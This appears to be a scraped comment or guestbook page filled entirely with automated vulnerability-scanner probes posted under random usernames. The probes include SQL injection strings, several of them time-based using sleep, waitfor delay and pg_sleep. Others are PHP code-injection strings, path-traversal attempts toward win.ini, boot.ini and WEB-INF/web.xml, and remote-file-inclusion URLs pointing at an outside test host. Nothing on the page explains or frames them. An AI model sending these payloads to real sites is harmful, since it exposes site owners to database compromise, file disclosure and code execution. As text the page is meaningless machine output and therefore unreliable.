.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fmbwkqdw
7/7/2019 11:20:04 PM

'"()

pmhktvpm
7/7/2019 11:20:08 PM

WEB-INF/web.xml

pmhktvpm
7/7/2019 11:20:10 PM

WEB-INF\web.xml

esbodqqm
7/7/2019 11:20:24 PM

)

esbodqqm
7/7/2019 11:20:26 PM

!(()&&!|*|*|

esbodqqm
7/7/2019 11:20:31 PM

^(#$!@#$)(()))******

fmbwkqdw
7/7/2019 11:20:39 PM

Ý kiến của bạn

rrkuspjk
7/7/2019 11:20:42 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

fmbwkqdw
7/7/2019 11:20:43 PM

'"()

rrkuspjk
7/7/2019 11:20:44 PM

1some_inexistent_file_with_long_name.jpg

rrkuspjk
7/7/2019 11:20:49 PM

Http://testasp.vulnweb.com/t/fit.txt

rrkuspjk
7/7/2019 11:20:51 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

rrkuspjk
7/7/2019 11:20:56 PM

testasp.vulnweb.com

jccdhntr
7/7/2019 11:21:00 PM

;print(md5(acunetix_wvs_security_test));

jccdhntr
7/7/2019 11:21:04 PM

';print(md5(acunetix_wvs_security_test));$a='

jccdhntr
7/7/2019 11:21:08 PM

";print(md5(acunetix_wvs_security_test));$a="

jccdhntr
7/7/2019 11:21:12 PM

${@print(md5(acunetix_wvs_security_test))}

jccdhntr
7/7/2019 11:21:20 PM

${@print(md5(acunetix_wvs_security_test))}\

esbodqqm
7/7/2019 11:21:21 PM

)

esbodqqm
7/7/2019 11:21:23 PM

!(()&&!|*|*|

esbodqqm
7/7/2019 11:21:30 PM

^(#$!@#$)(()))******

rrkuspjk
7/7/2019 11:21:47 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ebvqvbya
7/7/2019 11:21:48 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rrkuspjk
7/7/2019 11:21:50 PM

1some_inexistent_file_with_long_name.jpg

rrkuspjk
7/7/2019 11:21:53 PM

Http://testasp.vulnweb.com/t/fit.txt

ebvqvbya
7/7/2019 11:21:54 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rrkuspjk
7/7/2019 11:21:56 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ebvqvbya
7/7/2019 11:21:57 PM

-1 OR 2+684-684-1=0+0+0+1 --

rrkuspjk
7/7/2019 11:21:59 PM

testasp.vulnweb.com

ebvqvbya
7/7/2019 11:22:04 PM

-1 OR 3+684-684-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:22:08 PM

-1 OR 3*2<(0+5+684-684) --

jccdhntr
7/7/2019 11:22:09 PM

;print(md5(acunetix_wvs_security_test));

ebvqvbya
7/7/2019 11:22:12 PM

-1 OR 3*2>(0+5+684-684) --

jccdhntr
7/7/2019 11:22:13 PM

';print(md5(acunetix_wvs_security_test));$a='

jccdhntr
7/7/2019 11:22:15 PM

";print(md5(acunetix_wvs_security_test));$a="

ebvqvbya
7/7/2019 11:22:17 PM

-1 OR 2+953-953-1=0+0+0+1

qobxcisf
7/7/2019 11:22:18 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

jccdhntr
7/7/2019 11:22:20 PM

${@print(md5(acunetix_wvs_security_test))}

ebvqvbya
7/7/2019 11:22:20 PM

-1 OR 3+953-953-1=0+0+0+1

jccdhntr
7/7/2019 11:22:22 PM

${@print(md5(acunetix_wvs_security_test))}\

ebvqvbya
7/7/2019 11:22:26 PM

-1 OR 3*2<(0+5+953-953)

ebvqvbya
7/7/2019 11:22:30 PM

-1 OR 3*2>(0+5+953-953)

qobxcisf
7/7/2019 11:22:31 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ebvqvbya
7/7/2019 11:22:32 PM

-1' OR 2+88-88-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:22:34 PM

-1' OR 3+88-88-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:22:38 PM

-1' OR 3*2<(0+5+88-88) --

ebvqvbya
7/7/2019 11:22:42 PM

-1' OR 3*2>(0+5+88-88) --

ebvqvbya
7/7/2019 11:22:46 PM

-1' OR 2+425-425-1=0+0+0+1 or '62naiVAi'='

pmhktvpm
7/7/2019 11:22:48 PM

../../../../../../../../../../windows/win.ini

ebvqvbya
7/7/2019 11:22:49 PM

-1' OR 3+425-425-1=0+0+0+1 or '62naiVAi'='

qobxcisf
7/7/2019 11:22:51 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

pmhktvpm
7/7/2019 11:22:52 PM

../../../../../../../../../../boot.ini

ebvqvbya
7/7/2019 11:22:53 PM

-1' OR 3*2<(0+5+425-425) or '62naiVAi'='

ebvqvbya
7/7/2019 11:22:55 PM

-1' OR 3*2>(0+5+425-425) or '62naiVAi'='

rrkuspjk
7/7/2019 11:22:56 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

pmhktvpm
7/7/2019 11:22:57 PM

../../../../../../../../../../windows/win.ini.jpg

ebvqvbya
7/7/2019 11:22:58 PM

-1" OR 2+845-845-1=0+0+0+1 --

rrkuspjk
7/7/2019 11:22:59 PM

1some_inexistent_file_with_long_name.jpg

ebvqvbya
7/7/2019 11:23:02 PM

-1" OR 3+845-845-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:23:04 PM

������������������������������������������������windows��win.ini

rrkuspjk
7/7/2019 11:23:04 PM

Http://testasp.vulnweb.com/t/fit.txt

qobxcisf
7/7/2019 11:23:05 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rrkuspjk
7/7/2019 11:23:06 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

pmhktvpm
7/7/2019 11:23:07 PM

................windowswin.ini

ebvqvbya
7/7/2019 11:23:08 PM

-1" OR 3*2<(0+5+845-845) --

rrkuspjk
7/7/2019 11:23:09 PM

testasp.vulnweb.com

pmhktvpm
7/7/2019 11:23:11 PM

..\..\..\..\..\..\..\..\windows\win.ini

pmhktvpm
7/7/2019 11:23:14 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

qobxcisf
7/7/2019 11:23:15 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ebvqvbya
7/7/2019 11:23:16 PM

-1" OR 3*2>(0+5+845-845) --

jccdhntr
7/7/2019 11:23:17 PM

;print(md5(acunetix_wvs_security_test));

pmhktvpm
7/7/2019 11:23:18 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

jccdhntr
7/7/2019 11:23:20 PM

';print(md5(acunetix_wvs_security_test));$a='

ebvqvbya
7/7/2019 11:23:21 PM

if(now()=sysdate(),sleep(63),0)/*'XOR(if(now()=sysdate(),sleep(63),0))OR'"XOR(if(now()=sysdate(),sleep(63),0))OR"*/

pmhktvpm
7/7/2019 11:23:23 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

jccdhntr
7/7/2019 11:23:23 PM

";print(md5(acunetix_wvs_security_test));$a="

ebvqvbya
7/7/2019 11:23:24 PM

(select(0)from(select(sleep(63)))v)/*'+(select(0)from(select(sleep(63)))v)+'"+(select(0)from(select(sleep(63)))v)+"*/

qobxcisf
7/7/2019 11:23:25 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

pmhktvpm
7/7/2019 11:23:25 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

jccdhntr
7/7/2019 11:23:26 PM

${@print(md5(acunetix_wvs_security_test))}

ebvqvbya
7/7/2019 11:23:27 PM

1 waitfor delay '0:0:63' --

jccdhntr
7/7/2019 11:23:28 PM

${@print(md5(acunetix_wvs_security_test))}\

ebvqvbya
7/7/2019 11:23:29 PM

IwZ0roYJ'; waitfor delay '0:0:21' --

pmhktvpm
7/7/2019 11:23:31 PM

WEB-INF/web.xml

ebvqvbya
7/7/2019 11:23:33 PM

L03XhSiG'); waitfor delay '0:0:21' --

ebvqvbya
7/7/2019 11:23:34 PM

MW60vre5')); waitfor delay '0:0:42' --

qobxcisf
7/7/2019 11:23:35 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ebvqvbya
7/7/2019 11:23:36 PM

GYmLuPFh';select pg_sleep(42); --

pmhktvpm
7/7/2019 11:23:38 PM

WEB-INF\web.xml

ebvqvbya
7/7/2019 11:23:40 PM

fQKvruyb');select pg_sleep(42); --

ebvqvbya
7/7/2019 11:23:42 PM

OkYhmMW0'));select pg_sleep(63); --

qobxcisf
7/7/2019 11:23:45 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qobxcisf
7/7/2019 11:24:02 PM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

jccdhntr
7/7/2019 11:24:25 PM

;print(md5(acunetix_wvs_security_test));

jccdhntr
7/7/2019 11:24:30 PM

';print(md5(acunetix_wvs_security_test));$a='

jccdhntr
7/7/2019 11:24:32 PM

";print(md5(acunetix_wvs_security_test));$a="

jccdhntr
7/7/2019 11:24:35 PM

${@print(md5(acunetix_wvs_security_test))}

jccdhntr
7/7/2019 11:24:38 PM

${@print(md5(acunetix_wvs_security_test))}\

jccdhntr
7/7/2019 11:25:21 PM

;print(md5(acunetix_wvs_security_test));

jccdhntr
7/7/2019 11:25:23 PM

';print(md5(acunetix_wvs_security_test));$a='

jccdhntr
7/7/2019 11:25:29 PM

";print(md5(acunetix_wvs_security_test));$a="

jccdhntr
7/7/2019 11:25:31 PM

${@print(md5(acunetix_wvs_security_test))}

jccdhntr
7/7/2019 11:25:33 PM

${@print(md5(acunetix_wvs_security_test))}\

pmhktvpm
7/7/2019 11:25:38 PM

../../../../../../../../../../windows/win.ini

pmhktvpm
7/7/2019 11:25:44 PM

../../../../../../../../../../boot.ini

pmhktvpm
7/7/2019 11:25:48 PM

../../../../../../../../../../windows/win.ini.jpg

pmhktvpm
7/7/2019 11:25:52 PM

������������������������������������������������windows��win.ini

pmhktvpm
7/7/2019 11:25:55 PM

................windowswin.ini

pmhktvpm
7/7/2019 11:25:59 PM

..\..\..\..\..\..\..\..\windows\win.ini

pmhktvpm
7/7/2019 11:26:06 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

pmhktvpm
7/7/2019 11:26:10 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

pmhktvpm
7/7/2019 11:26:13 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

pmhktvpm
7/7/2019 11:26:16 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

jccdhntr
7/7/2019 11:26:18 PM

;print(md5(acunetix_wvs_security_test));

pmhktvpm
7/7/2019 11:26:19 PM

WEB-INF/web.xml

ebvqvbya
7/7/2019 11:26:20 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

jccdhntr
7/7/2019 11:26:21 PM

';print(md5(acunetix_wvs_security_test));$a='

pmhktvpm
7/7/2019 11:26:23 PM

WEB-INF\web.xml

ebvqvbya
7/7/2019 11:26:23 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

jccdhntr
7/7/2019 11:26:25 PM

";print(md5(acunetix_wvs_security_test));$a="

jccdhntr
7/7/2019 11:26:28 PM

${@print(md5(acunetix_wvs_security_test))}

ebvqvbya
7/7/2019 11:26:29 PM

-1 OR 2+230-230-1=0+0+0+1 --

jccdhntr
7/7/2019 11:26:32 PM

${@print(md5(acunetix_wvs_security_test))}\

ebvqvbya
7/7/2019 11:26:33 PM

-1 OR 3+230-230-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:26:36 PM

-1 OR 3*2<(0+5+230-230) --

ebvqvbya
7/7/2019 11:26:40 PM

-1 OR 3*2>(0+5+230-230) --

ebvqvbya
7/7/2019 11:26:44 PM

-1 OR 2+781-781-1=0+0+0+1

ebvqvbya
7/7/2019 11:26:47 PM

-1 OR 3+781-781-1=0+0+0+1

ebvqvbya
7/7/2019 11:26:50 PM

-1 OR 3*2<(0+5+781-781)

ebvqvbya
7/7/2019 11:26:53 PM

-1 OR 3*2>(0+5+781-781)

ebvqvbya
7/7/2019 11:26:57 PM

-1' OR 2+339-339-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:27:00 PM

-1' OR 3+339-339-1=0+0+0+1 --

ebvqvbya
